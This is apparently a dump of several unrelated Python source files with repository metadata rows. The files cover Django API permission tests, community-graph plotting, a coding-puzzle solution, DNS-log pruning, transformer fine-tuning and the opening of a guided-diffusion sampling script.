cls.refresh = str(RefreshToken.for_user(cls.user).access_token)
def test_get_method_is_allowed_with_authenticated_user(self):
"""
assert any authenticated user is
allowed to retrieve their user data.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.get(self.user_url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data['id'], self.user.id)
self.assertEqual(res.data['username'], self.user.username)
self.assertEqual(res.data['email'], self.user.email)
self.assertEqual(res.data['company'], self.user.company)
self.assertEqual(res.data['user_type'], self.user.user_type)
self.assertEqual(res.data['is_staff'], self.user.is_staff)
self.assertEqual(res.data['is_superuser'], self.user.is_superuser)
def test_get_method_is_not_allowed_with_unauthenticated_user(self):
"""
assert non authenticated users
can not access user data.
"""
res = self.client.get(self.user_url)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_method_is_not_allowed(self):
"""
assert post method is not allowed.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.post(self.user_url)
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_method_is_not_allowed(self):
"""
assert delete method is not allowed.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.delete(self.user_url)
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_patch_method_is_not_allowed(self):
"""
assert patch method is not allowed.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.patch(self.user_url)
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_put_method_is_not_allowed(self):
"""
assert put method is not allowed.
"""
self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.refresh}')
res = self.client.put(self.user_url)
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
| 36.662338 | 77 | 0.691463 | 364 | 2,823 | 5.126374 | 0.206044 | 0.055734 | 0.125402 | 0.086817 | 0.567524 | 0.522508 | 0.443194 | 0.443194 | 0.443194 | 0.443194 | 0 | 0.008021 | 0.205101 | 2,823 | 76 | 78 | 37.144737 | 0.823529 | 0.094934 | 0 | 0.268293 | 0 | 0 | 0.07375 | 0 | 0 | 0 | 0 | 0 | 0.317073 | 1 | 0.170732 | false | 0 | 0.121951 | 0 | 0.317073 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
620fc6ee7f3085e8c764587654dd61e82be6309d | 4,003 | py | Python | cdlib/viz/networks.py | lloyd334/cdlib | 5214027025f5812aeb70f19ec28425ceaf3287fb | [
"BSD-2-Clause"
] | 1 | 2020-09-07T10:03:11.000Z | 2020-09-07T10:03:11.000Z | cdlib/viz/networks.py | lloyd334/cdlib | 5214027025f5812aeb70f19ec28425ceaf3287fb | [
"BSD-2-Clause"
] | null | null | null | cdlib/viz/networks.py | lloyd334/cdlib | 5214027025f5812aeb70f19ec28425ceaf3287fb | [
"BSD-2-Clause"
] | null | null | null | import matplotlib.pyplot as plt
import networkx as nx
from cdlib import NodeClustering
from cdlib.utils import convert_graph_formats
from community import induced_graph
__all__ = ["plot_network_clusters", "plot_community_graph"]
COLOR = ['r', 'b', 'g', 'c', 'm', 'y', 'k',
'0.8', '0.2', '0.6', '0.4', '0.7', '0.3', '0.9', '0.1', '0.5']
def plot_network_clusters(graph, partition, position, figsize=(8, 8), node_size=200, plot_overlaps=False,
plot_labels=False):
"""
Plot a graph with node color coding for communities.
:param graph: NetworkX/igraph graph
:param partition: NodeClustering object
:param position: A dictionary with nodes as keys and positions as values. Example: networkx.fruchterman_reingold_layout(G)
:param figsize: the figure size; it is a pair of float, default (8, 8)
:param node_size: int, default 200
:param plot_overlaps: bool, default False. Flag to control if multiple algorithms memberships are plotted.
:param plot_labels: bool, default False. Flag to control if node labels are plotted.
Example:
>>> from cdlib import algorithms, viz
>>> import networkx as nx
>>> g = nx.karate_club_graph()
>>> coms = algorithms.louvain(g)
>>> pos = nx.spring_layout(g)
>>> viz.plot_network_clusters(g, coms, pos)
"""
partition = partition.communities
graph = convert_graph_formats(graph, nx.Graph)
n_communities = min(len(partition), len(COLOR))
plt.figure(figsize=figsize)
plt.axis('off')
fig = nx.draw_networkx_nodes(graph, position, node_size=node_size, node_color='w')
fig.set_edgecolor('k')
nx.draw_networkx_edges(graph, position, alpha=.5)
for i in range(n_communities):
if len(partition[i]) > 0:
if plot_overlaps:
size = (n_communities - i) * node_size
else:
size = node_size
fig = nx.draw_networkx_nodes(graph, position, node_size=size,
nodelist=partition[i], node_color=COLOR[i])
fig.set_edgecolor('k')
if plot_labels:
nx.draw_networkx_labels(graph, position, labels={node: str(node) for node in graph.nodes()})
return fig
def plot_community_graph(graph, partition, figsize=(8, 8), node_size=200, plot_overlaps=False, plot_labels=False):
"""
Plot a algorithms-graph with node color coding for communities.
:param graph: NetworkX/igraph graph
:param partition: NodeClustering object
:param figsize: the figure size; it is a pair of float, default (8, 8)
:param node_size: int, default 200
:param plot_overlaps: bool, default False. Flag to control if multiple algorithms memberships are plotted.
:param plot_labels: bool, default False. Flag to control if node labels are plotted.
Example:
>>> from cdlib import algorithms, viz
>>> import networkx as nx
>>> g = nx.karate_club_graph()
>>> coms = algorithms.louvain(g)
>>> viz.plot_community_graph(g, coms)
"""
cms = partition.communities
node_to_com = {}
for cid, com in enumerate(cms):
for node in com:
if node not in node_to_com:
node_to_com[node] = cid
else:
# duplicating overlapped node
alias = "%s_%s" % (node, cid)
node_to_com[alias] = cid
edges = [(alias, y) for y in graph.neighbors(node)]
graph.add_edges_from(edges)
# handling partial coverage
s = nx.subgraph(graph, node_to_com.keys())
# algorithms graph construction
c_graph = induced_graph(node_to_com, s)
node_cms = [[node] for node in c_graph.nodes()]
return plot_network_clusters(c_graph, NodeClustering(node_cms, None, ""), nx.spring_layout(c_graph), figsize=figsize,
node_size=node_size, plot_overlaps=plot_overlaps, plot_labels=plot_labels)
| 37.764151 | 126 | 0.641019 | 535 | 4,003 | 4.62243 | 0.239252 | 0.035584 | 0.021836 | 0.032349 | 0.42499 | 0.42499 | 0.42499 | 0.42499 | 0.42499 | 0.390214 | 0 | 0.013396 | 0.254059 | 4,003 | 105 | 127 | 38.12381 | 0.814802 | 0.365726 | 0 | 0.085106 | 0 | 0 | 0.036705 | 0.008963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.106383 | 0 | 0.191489 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
620fd414668160b671194271d3ab3f1f144ddd9d | 801 | py | Python | Python/rulingpair.py | Brabec/Hacktoberfest2020 | d3a85850a462ab24abf59d68b5142e0b61b5ce37 | [
"MIT"
] | null | null | null | Python/rulingpair.py | Brabec/Hacktoberfest2020 | d3a85850a462ab24abf59d68b5142e0b61b5ce37 | [
"MIT"
] | null | null | null | Python/rulingpair.py | Brabec/Hacktoberfest2020 | d3a85850a462ab24abf59d68b5142e0b61b5ce37 | [
"MIT"
] | null | null | null | #User function Template for python3
def RulingPair(arr, n):
# code here
d=dict()
for i in arr:
s=str(i)
x=0
for j in range(len(s)):
x=x+int(s[j])
if x not in d:
d[x]=[i]
else:
d[x].append(i)
maxi=-1
l=[]
for i in d:
if len(d[i])>1:
x1=d[i].index(max(d[i]))
x=d[i][x1]
d[i]=d[i][:x1]+d[i][x1+1:]
x=x+max(d[i])
maxi=max(maxi,x)
return maxi
#{
# Driver Code Starts
#Initial Template for Python 3
if __name__ == '__main__':
t = int(input())
for _ in range(t):
n = int(input())
arr = list(map(int, input().strip().split()))
print(RulingPair(arr,n))
# } Driver Code Ends | 19.071429 | 53 | 0.440699 | 124 | 801 | 2.774194 | 0.395161 | 0.046512 | 0.034884 | 0.02907 | 0.034884 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020619 | 0.394507 | 801 | 42 | 54 | 19.071429 | 0.68866 | 0.142322 | 0 | 0 | 0 | 0 | 0.01173 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.074074 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62109e38a7addafd546b1520fe1722f2442a523e | 8,864 | py | Python | src/dataprun.py | kentlingcampbell/CU_HIN | 65b0217be5844cceef7405bbb9e046ce7fd36c81 | [
"MIT"
] | null | null | null | src/dataprun.py | kentlingcampbell/CU_HIN | 65b0217be5844cceef7405bbb9e046ce7fd36c81 | [
"MIT"
] | null | null | null | src/dataprun.py | kentlingcampbell/CU_HIN | 65b0217be5844cceef7405bbb9e046ce7fd36c81 | [
"MIT"
] | null | null | null | import re #check valid Domain/String
from datetime import datetime #running time
from ipaddress import ip_address #check valid ip
import sys #Eception information
#True if data is valid
def ValidDomain(Domain):
#Valid Domain
DomainSize = len(Domain) >= 2 and len(Domain) <= 255 # 2 < Domain length < 255
DomainChar = re.search("[^a-zA-Z0-9\.\-]",Domain) == None #Only a-z/A-Z, 0-9,-,.
DomainFirst = re.search("[a-zA-Z0-9]",Domain[0]) #Only a-zA-Z0-9
DomainLast = Domain[-1] != "-" and Domain[-1] != "." #Not - or .
#max 63 per label
return DomainSize and DomainChar and DomainFirst and DomainLast
def ValidIP(IP):
try:
result = ip_address(IP)
return True
except: #ValueError Exception
return False
def Answer2IP(Answer):
answers = Answer.split(",") #potential multiple ips
result = [] #<string>
for a in answers:
#check IP addresses
if(ValidIP(a)):
result.append(a)
#print(result)
return result
def ReadInLogs(LogList,clean=True):
ReadinLogDict = dict() #MixIdentifier[id.orig_h+id.orig_p+id.resp_h+id.resp_p+trans_id]<String>:List<Strings>[Client,Domain,IPs]
DomainDict = dict() #Domains<string>:appeared times<int>
ClientDict = dict() #Client<string>: appeared times<list<string>>
IPDict = dict() #IP<string>: Domain<string>
RL = []#Record List Store a list of [DOmain,Client,IPs] for build other dictionary
TotalLine = 0
ValidLine = 0
for Log in LogList:
#print(Log)
try:
with open(Log,"r") as LogData:
Data = LogData.readlines()
print("Inputing {} lines ... ".format(len(Data)))
for line in Data:
if(line[0] == "#"):
continue #ignore first line
#print(line)
TotalLine += 1
dline = line.strip().split("\t") #require given format, otherwise throw exception
IDKey = dline[2]+dline[3]+dline[4]+dline[5]+dline[7]
Client = dline[2]
Domain = dline[9]
IPList = Answer2IP(dline[21])
updateFlag = False #determine if can updates
if(Domain == "-" and len(IPList) < 1):
continue #ignore such log
if(IDKey in ReadinLogDict):
#update Domian
if(ReadinLogDict.get(IDKey)[1] == "-" and ValidDomain(Domain)):
ReadinLogDict[IDKey][1] = Domain
IPList = ReadinLogDict[IDKey][2]
updateFlag = True
ValidLine += 2 #need two logs
#print("C1-")
#update IPs from Answer
if(len(ReadinLogDict.get(IDKey)[2]) == 0 and len(IPList) > 0): #at least one valid IP
ReadinLogDict[IDKey][2] = IPList
Domain = ReadinLogDict[IDKey][1]
updateFlag = True
ValidLine += 2 #need two logs
#print("C2-")
else:
if((Domain == "-" or ValidDomain(Domain)) and (ValidIP(Client) or dline[21] == "-")):
#Client should be valid; Domain either valid or empty
ReadinLogDict[IDKey] = [Client,Domain,IPList]
updateFlag = (Domain != "-" and len(IPList) > 0)
ValidLine += 1
#print("C3")
#if both domian and IPs exists, update to other dictoionaries
#if(IDKey in ReadinLogDict and not updateFlag):
#print(IDKey)
#print(ReadinLogDict[IDKey])
if(updateFlag):
#if(IDKey in ReadinLogDict):
#print(IDKey)
#print(ReadinLogDict[IDKey])
RL.append([Domain,Client,IPList])
#Domain
if(Domain not in DomainDict):
DomainDict[Domain] = 0
DomainDict[Domain] += 1
#Client
if(Client not in ClientDict):
ClientDict[Client] = 0
ClientDict[Client] += 1
#IPs
for ip in IPList:
if(ip not in IPDict):
IPDict[ip] = []
IPDict[ip].append(Domain)
except IOError as Error:
print("ERROR: I/O error {} CHECK INPUT FILE NAME AND ADDRESS".format(Error))
except:
print("ERROR: {}".format(sys.exc_info()[0]))
precent = 0
if(TotalLine != 0): precent = (ValidLine/TotalLine)*100
print("Read in {} log; {} ({:.3f}%) logs are useful (contain valid domain/client/ips)".format(TotalLine,ValidLine,precent))
print("Valid Domains: {}\nValid Clients: {}\nValid IPs: {}".format(len(DomainDict),len(ClientDict),len(IPDict)))
#only retuen cleaned clients,domains.ips
return (RL,DomainDict,ClientDict,IPDict,TotalLine)
#Output three dict contain valid Client,Domain,IPs and their No.
#Domain Dict No<int>:Domain<String>
#Client Dict No<int>:Client<String>
#IP Dict No<ing>: IP<String>
def Prun(DomainDict,ClientDict,IPDict,TotalCall,kd=1,ka=1,kc=1): #defaulr settingska=0.25,kb=0.001,kc=3
#make sure input isn't empty
if(len(DomainDict) < 1 or len(ClientDict) < 1 or len(IPDict) < 1):
return None
MaxDomain = len(DomainDict)*kd #popular domain
MaxClient = TotalCall*ka #busy client
#print(MaxDomain," ",MaxClient)
DomainNo = dict()
ClientNo = dict()
IPNo = dict()
#Domain
index = 0 #may adjusted
for domain in DomainDict:
if(DomainDict.get(domain) < MaxDomain):
DomainNo[index] = domain
index += 1
#Client
index = 0
for client in ClientDict:
cNum = ClientDict.get(client)
if(cNum < MaxClient and cNum >= kc):
ClientNo[index] = client
index += 1
#IP
index = 0
for ip in IPDict:
if(len(IPDict.get(ip)) > 1):
IPNo[index] = ip
index += 1
#any of the empty dict should no reach here
dp = (len(DomainNo)/len(DomainDict))*100
cp = (len(ClientNo)/len(ClientDict))*100
ipp = (len(IPNo)/len(IPDict))*100
print("Pruned Data:\nDomain: {} ({:.3f}% remain)\nClient: {}({:.3f}% remain)\nIP: {}({:.3f}% remain)".format(len(DomainNo),dp,len(ClientNo),cp,len(IPNo),ipp))
return (DomainNo,ClientNo,IPNo)
def GenerateWL(LogLists,kd=1,ka=1,kc=1,cleanFlag=True,prunFlag=True,ShowTime=True):
st = datetime.now()
RL,DD,CD,IPD,TCalls = ReadInLogs(LogLists,cleanFlag)
et = datetime.now()
tt = et - st
print()
if(ShowTime):print("Read in cost:{}".format(tt))
#No empty dictionary
if(len(DD) > 0 and len(CD) > 0 and len(IPD) > 0):
print()
print("Data {} Cleaned. Start pruning ... ".format(TCalls))
if(prunFlag):
st = datetime.now()
Nos = Prun(DD,CD,IPD,TCalls,kd,ka,kc)
et = datetime.now()
tt = et - st
print()
if(ShowTime):print("Purn cost:{}".format(tt))
return (RL,Nos)
else:
return None
def GenerateDomain2IP(RL,DD,IPD):
Domain2IP = dict()
Domains = list(DD.values())
IPs = list(IPD.values())
#intialization
for dd in Domains:
Domain2IP[dd] = []
for record in RL:
if(record[0] in Domain2IP): #valid domain
for ip in record[2]:
if(ip in IPs): Domain2IP[record[0]].append(ip)
result = {key:list(set(val)) for key, val in Domain2IP.items() if len(val) > 0}
return result
if "__name__" == "__main__":
RL,TD = GenerateWL(["2021-02-09_dns.01:00:00-02:00:00.log"])#,kd=0.25,ka=0.001,kc=3)
DD,CD,IPD = TD
st = datetime.now()
D2IP = GenerateDomain2IP(RL,DD,IPD)
et = datetime.now()
tt = et - st
print("Time cost {}".format(tt))
print("Dictionary size {}".format(len(D2IP)))
#print(RL)
#for dip in D2IP:
# print("{}: {}".format(dip,D2IP.get(dip)))
#for dd in DD:
# print("[{}] {}".format(DD[dd],dd))
| 33.832061 | 162 | 0.5088 | 989 | 8,864 | 4.542973 | 0.252781 | 0.028044 | 0.003339 | 0.004006 | 0.068106 | 0.053416 | 0.04941 | 0.035166 | 0.01736 | 0.01736 | 0 | 0.026203 | 0.367103 | 8,864 | 261 | 163 | 33.961686 | 0.774688 | 0.192013 | 0 | 0.219355 | 0 | 0.012903 | 0.068951 | 0.005076 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045161 | false | 0 | 0.025806 | 0 | 0.135484 | 0.090323 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6212ed730ff6390351c6a821151048f3e1ac283a | 12,255 | py | Python | src/train.py | jharkawat/Amazon_ml_challenge | d39278142c072ee13970b408605b6d38242826c4 | [
"MIT"
] | 2 | 2021-09-15T07:23:46.000Z | 2021-09-15T07:43:08.000Z | src/train.py | jharkawat/Amazon_ml_challenge | d39278142c072ee13970b408605b6d38242826c4 | [
"MIT"
] | null | null | null | src/train.py | jharkawat/Amazon_ml_challenge | d39278142c072ee13970b408605b6d38242826c4 | [
"MIT"
] | 1 | 2021-09-15T07:23:27.000Z | 2021-09-15T07:23:27.000Z | import numpy as np
import pandas as pd
import csv
import os
import glob
import pandas as pd
from torch.utils.data import TensorDataset
from transformers import AutoTokenizer, AutoModelForSequenceClassification
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
from transformers import AdamW, get_linear_schedule_with_warmup
import argparse
from sklearn.model_selection import train_test_split
import torch
import torch.nn as nn
from tqdm import tqdm
import json
from util import f1_score_func, accuracy_per_class
import util
import logging
parser = argparse.ArgumentParser()
parser.add_argument('--model', default='roberta-base', help="model name from huggingface")
parser.add_argument('--experiment_name', default='sample-roberta-training-properly', help="model name from huggingface") #sample-try-with-bert-base
parser.add_argument('--used_tokenized_data', type=bool, default=False, help="saved pickled tokenizer faster laoding in future")
parser.add_argument("--epochs", type=int, default=5)
parser.add_argument("--batch_size_train", type=int, default=32)
parser.add_argument("--batch_size_val", type=int, default=32)
parser.add_argument("--dummy", type=bool, default=False)
parser.add_argument("--full_finetuning", type=bool, default=True)
parser.add_argument("--loading_from_prev_pretrain", type=bool, default=False)
parser.add_argument("--trained_model", default="sample-distilbert-run2/finetuned_BERT_epoch_1.model")
def evaluate(dataloader_val, model):
model.eval()
loss_val_total = 0
predictions, true_vals = [], []
for batch in dataloader_val:
batch = tuple(b.to(0) for b in batch)
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[2],
}
with torch.no_grad():
outputs = model(**inputs)
loss = outputs[0]
loss = loss.mean()
logits = outputs[1]
loss_val_total += loss.item()
logits = logits.detach().cpu().numpy()
label_ids = inputs['labels'].cpu().numpy()
predictions.append(logits)
true_vals.append(label_ids)
loss_val_avg = loss_val_total/len(dataloader_val)
predictions = np.concatenate(predictions, axis=0)
true_vals = np.concatenate(true_vals, axis=0)
return loss_val_avg, predictions, true_vals
if (__name__ == "__main__"):
args = parser.parse_args()
exp_name = args.experiment_name
# logging args parsers fileds
#assert Path("./"+exp_name).exists()
os.mkdir(exp_name)
util.set_logger(os.path.join(exp_name, 'train.log'))
logging.info("Training Arguments: {}" .format(args))
try:
os.system("nvidia-smi")
except:
print("Something went wrong with nvidia-smi command")
logging.info("loading all the files of data")
# logging tokeinzer used
tokenizer = AutoTokenizer.from_pretrained(args.model)
logging.info("Used tokenizer: {}".format(tokenizer))
# directly loading tokenized data from from pickle
if args.used_tokenized_data:
logging.info("loading tokenized data")
encoded_data_train = torch.load("data/tokenized/encoded_data_train.pt")
encoded_data_val = torch.load("data/tokenized/encoded_data_val.pt")
else:
#filenames = [name for name in glob.glob('./data/dataset/train.csv')]
filenames = ["custum-data/val.csv", "custum-data/train.csv"]
df = pd.concat( [ pd.read_csv(f, low_memory=False) for f in filenames ] )
dict = {'desc': 'BULLET_POINTS',
'BROWSE_NODE_ID': 'BROWSE_NODE_ID'}
# call rename () method
df.rename(columns=dict,
inplace=True)
#df = pd.read_csv("./data/dataset/train.csv", escapechar = "\\", quoting = csv.QUOTE_NONE)
if (args.dummy):
# logging
logging.info("dummy data")
df = df[:400]
#df = df[["BULLET_POINTS", "BROWSE_NODE_ID"]]
#df = pd.concat( [ pd.read_csv(f, sep='\t', names=['id', 'BROWSE_NODE_ID','BULLET_POINTS']) for f in filenames ] )
logging.info("Loaded sucessfull")
possible_labels = df.BROWSE_NODE_ID.unique()
label_dict = {}
for index, possible_label in enumerate(possible_labels):
label_dict[possible_label] = index
#os.path.join(exp_name, 'params.json')
with open(os.path.join(exp_name, 'params.json'), 'w') as fp:
label_dict = {int(k):int(v) for k,v in label_dict.items() }
json.dump(label_dict, fp)
# logging the location of dump dict
logging.info("Dump label_dict location: {}".format(os.path.join(exp_name, 'params.json')))
df['label'] = df.BROWSE_NODE_ID.replace(label_dict)
df = df.dropna()
# drop row if no of label in BROWSE_NODE_ID is less than 2
X_train, X_val, y_train, y_val = train_test_split(df.index.values,
df.label.values,
test_size=0.35,
random_state=44)
df['data_type'] = ['not_set']*df.shape[0]
df.loc[X_train, 'data_type'] = 'train'
df.loc[X_val, 'data_type'] = 'val'
encoded_data_train = tokenizer.batch_encode_plus(
df[df.data_type=='train'].BULLET_POINTS.values.tolist(),
add_special_tokens=True,
return_attention_mask=True,
pad_to_max_length=True,
max_length=512,
return_tensors='pt'
)
# logging of encoded data
logging.info("Encoded train data: encoded_data_train")
encoded_data_val = tokenizer.batch_encode_plus(
df[df.data_type=='val'].BULLET_POINTS.values.tolist(),
add_special_tokens=True,
return_attention_mask=True,
pad_to_max_length=True,
max_length=512,
return_tensors='pt'
)
logging.info("Encoded val data: encoded_data_val")
#torch.save(encoded_data_train, exp_name+"/encoded_data_train.pt")
#torch.save(encoded_data_val, exp_name+"/encoded_data_val.pt")
logging.info("Dumped encoded_data_train.pt and encoded_data_val.pt")
input_ids_train = encoded_data_train['input_ids']
attention_masks_train = encoded_data_train['attention_mask']
labels_train = torch.tensor(df[df.data_type=='train'].label.values)
input_ids_val = encoded_data_val['input_ids']
attention_masks_val = encoded_data_val['attention_mask']
labels_val = torch.tensor(df[df.data_type=='val'].label.values)
dataset_train = TensorDataset(input_ids_train, attention_masks_train, labels_train)
dataset_val = TensorDataset(input_ids_val, attention_masks_val, labels_val)
## BERT MODEL
logging.info("Loading AutoModel model")
model = AutoModelForSequenceClassification.from_pretrained(args.model,
num_labels=len(label_dict),
output_attentions=False,
output_hidden_states=False)
if args.loading_from_prev_pretrain:
logging.info("Loading pretrained model")
model.load_state_dict(torch.load(args.trained_model))
model = nn.DataParallel(model)
logging.info("using Multi GPU data parallel")
## DataLoader
batch_size_train = args.batch_size_train
batch_size_val = args.batch_size_val
logging.info("batch size train: {}" .format(batch_size_train))
logging.info("batch size val: {}" .format(batch_size_val))
dataloader_train = DataLoader(dataset_train,
sampler=RandomSampler(dataset_train),
batch_size=batch_size_train)
dataloader_validation = DataLoader(dataset_val,
sampler=SequentialSampler(dataset_val),
batch_size=batch_size_val)
#optimizer = AdamW(model.parameters(),
# lr=1e-5,
# eps=1e-8)
epochs = args.epochs
weight_decay = 0.01
logging.info("epochs: {}" .format(epochs))
if args.full_finetuning:
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
'weight_decay': 0.0}
]
# embedding(tokenzing instialled form based pretrained)--> Architecture (tranformer based stacks) --> classifier (linear classifier/ svm ) # intally ended to trainabl e
else: # only finetune the head classifier
param_optimizer = list(model.classifier.named_parameters())
optimizer_grouped_parameters = [{'params': [p for n, p in param_optimizer]}]
optimizer = AdamW(optimizer_grouped_parameters, lr=1e-5, correct_bias=False)
scheduler = get_linear_schedule_with_warmup(optimizer,
num_warmup_steps=0,
num_training_steps=len(dataloader_train)*epochs)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#model.to(device)
model = model.to(0)
logging.info("Device: {}" .format(device))
#print(device)
best_acc = 0.0
patience_counter = 0
# logging all the paramters of agrs
#logging.info("Training Arguments: {}" .format(args))
for epoch in tqdm(range(1, epochs+1)):
if args.full_finetuning:
model.train()
else:
model.classifier.train()
loss_train_total = 0
progress_bar = tqdm(dataloader_train, desc='Epoch {:1d}'.format(epoch), leave=False, disable=False)
for batch in progress_bar:
model.zero_grad()
batch = tuple(b.to(0) for b in batch)
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[2],
}
outputs = model(**inputs)
loss = outputs[0]
loss = loss.mean()
loss_train_total += loss.item()
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
optimizer.step()
scheduler.step()
progress_bar.set_postfix({'training_loss': '{:.3f}'.format(loss.item()/len(batch))})
torch.save(model.state_dict(), f'{exp_name}/finetuned_BERT_epoch_{epoch}.model')
tqdm.write(f'\nEpoch {epoch}')
loss_train_avg = loss_train_total/len(dataloader_train)
tqdm.write(f'Training loss: {loss_train_avg}')
val_loss, predictions, true_vals = evaluate(dataloader_validation, model)
val_f1, acc = f1_score_func(predictions, true_vals)
tqdm.write(f'Validation loss: {val_loss}')
tqdm.write(f'F1 Score (Weighted): {val_f1}')
logging.info(f'F1 Score (Weighted): {val_f1}')
logging.info(f'Accuracy: {acc}')
improve_acc = acc - best_acc
patience = 0.02
patience_num = 10
min_epoch_num =5
if improve_acc > 1e-5:
logging.info("- Found new best Accuarcy")
best_acc = acc
torch.save(model.state_dict(), f'{exp_name}/finetuned_BERT_best.model')
if improve_acc < patience:
patience_counter += 1
else:
patience_counter = 0
else:
patience_counter += 1
# Early stopping and logging best f1
if (patience_counter >= patience_num and epoch > min_epoch_num) or epoch == epochs:
logging.info("Best val f1: {:05.2f}".format(best_acc))
break
| 37.24924 | 172 | 0.613382 | 1,486 | 12,255 | 4.824361 | 0.222746 | 0.033756 | 0.023713 | 0.007253 | 0.227089 | 0.188869 | 0.162645 | 0.126238 | 0.116195 | 0.090947 | 0 | 0.009367 | 0.276948 | 12,255 | 328 | 173 | 37.362805 | 0.799684 | 0.101346 | 0 | 0.168182 | 0 | 0 | 0.142714 | 0.029599 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004545 | false | 0 | 0.086364 | 0 | 0.095455 | 0.004545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62134616f3fd788b3a75e202a5e94200490ab80e | 11,438 | py | Python | get_classifier_groundth_guidance.py | ZGCTroy/guided-diffusion | af987bb2b65db2875148a5466df79736ea5ae6a1 | [
"MIT"
] | null | null | null | get_classifier_groundth_guidance.py | ZGCTroy/guided-diffusion | af987bb2b65db2875148a5466df79736ea5ae6a1 | [
"MIT"
] | null | null | null | get_classifier_groundth_guidance.py | ZGCTroy/guided-diffusion | af987bb2b65db2875148a5466df79736ea5ae6a1 | [
"MIT"
] | null | null | null | """
Like image_sample.py, but use a noisy image classifier to guide the sampling
process towards more realistic images.
"""
import argparse
import os
import numpy as np
import torch as th
import torch.distributed as dist
import torch.nn.functional as F
from guided_diffusion.image_datasets import load_data
import matplotlib.pyplot as plt
from guided_diffusion import dist_util, logger
from guided_diffusion.script_util import (
model_defaults,
diffusion_defaults,
classifier_defaults,
create_model,
create_gaussian_diffusion,
create_classifier,
add_dict_to_argparser,
args_to_dict,
)
from guided_diffusion.sample_util import save_samples
from tqdm import tqdm
def get_gathered_item(x):
gathered_x = [th.zeros_like(x) for _ in range(dist.get_world_size())]
dist.all_gather(gathered_x, x)
return gathered_x
def main():
args = create_argparser().parse_args()
visible_gpus_list = []
if args.gpus:
visible_gpus_list = [str(gpu_id) for gpu_id in args.gpus.split(",")]
dist_util.setup_dist(visible_gpu_list=visible_gpus_list, local_rank=args.local_rank)
logger.configure(dir=os.path.join(args.log_root, args.save_name))
logger.log(args)
logger.log("creating model and diffusion...")
model = create_model(
**args_to_dict(args, model_defaults().keys())
)
diffusion = create_gaussian_diffusion(
**args_to_dict(args, diffusion_defaults().keys())
)
if args.model_path:
model.load_state_dict(
dist_util.load_state_dict(args.model_path, map_location="cpu"),
strict=True
)
model.to(dist_util.dev())
if args.use_fp16:
model.convert_to_fp16()
model.eval()
classifier = create_classifier(
**args_to_dict(args, classifier_defaults().keys())
)
if args.classifier_path:
logger.log("loading classifier from {}".format(args.classifier_path))
classifier.load_state_dict(
dist_util.load_state_dict(args.classifier_path, map_location="cpu"),
strict=True
)
classifier.to(dist_util.dev())
if args.classifier_use_fp16:
classifier.convert_to_fp16()
classifier.eval()
step_size = 25 if args.timestep_respacing == 'ddim25' else args.timestep_respacing
batch_grad_norm = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_updated_grad_norm = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_probability = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_entropy = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_entropy_scale = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
